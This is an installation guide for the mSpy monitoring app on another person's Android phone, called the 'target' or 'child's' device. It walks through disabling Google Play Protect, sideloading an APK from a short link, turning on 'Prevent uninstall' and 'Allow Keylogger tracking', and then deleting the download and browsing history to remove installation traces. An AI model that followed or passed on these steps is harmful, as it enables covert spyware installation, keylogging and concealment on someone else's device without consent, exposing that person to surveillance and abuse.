mSpy Installation on Android Devices

In order to install mSpy, you need to follow these steps:

Step 1 - Preparation:

- Enable/Turn on 'Unknown Sources' under Settings -> Lock screen & Security (or Settings -> Security). Please note that this option may not be available on some devices. In that case, you can just proceed to the next step.
- Disable/turn OFF 'Google Play Protect' under Settings -> Google -> Security -> Google Play Protect -> disable 'Scan device for security threats'.

Enable Unknown sources. If you cannot find Unknown sources on your child's device, that's fine. Return back to Settings and proceed to the next step according to the installation guide.

Step 2 - Download the mSpy installation file:

- Launch the 'Google Chrome' browser (or just 'Chrome').
- Tap on the address bar on the top of the Chrome browser.
- Type the following: b55y.net/a
- After a page appears please draw the verification Captcha (draw the shape or enter letters);
- Once the shape is drawn successfully please press the 'Download' button, then press 'Open'.

Step 3 - mSpy installation procedure:

- Press ‘Next’ - ‘Next’ - ‘Install’, then ‘Open’.
- On the mSpy installation window ‘Welcome to mSpy’ you need to tick ‘Accept license agreement to proceed’
- Then turn on the option ‘Prevent uninstall’ and you will be transferred to Settings to activate the ‘Update Service’ option (press the ‘Activate’ button). Once it’s done return back (press ‘Back’ button).
- Turn on the ‘Allow Keylogger tracking’ option and you will be transferred to activate/enable ‘Framework Update Service’ in the list of options. Press ‘Back’ to return to the mSpy installation window.
- Turn on the ‘Allow collecting data’ option and you will be transferred to activate/enable ‘Update Service’. Press ‘Back’ to return to the mSpy installation window.
- Insert/type the mSpy registration code that you can find on Step 3 of the installation wizard in your mSpy account.

If there is no ‘Open’ button after installation it means that you have previously installed mSpy and have not uninstalled it. In this case, you need to remove mSpy from the device and proceed with installation again. Click here to see the guide on how to remove the previous mSpy build.

Turn Framework Update Service ON.

Please press the backwards button twice to return to the mSpy installation window. If it kicked you out of the installation window you can still find the mSpy app from the main screen of your device and continue installation.

Please scroll down and hit 'Proceed'.

You will see the registration code here

Please enter that code on the target phone

Step 4 - Remove the installation traces:

- Open the ‘Google Chrome’ web-browser and find 3 vertical dots in the upper right corner (Settings button). Press on it and look for the ‘Downloads’ option. Please remove ‘bt.apk’ file from the target device (this is an mSpy installation file).

You can either clear browsing data for the last hour or delete the relevant traces selectively.
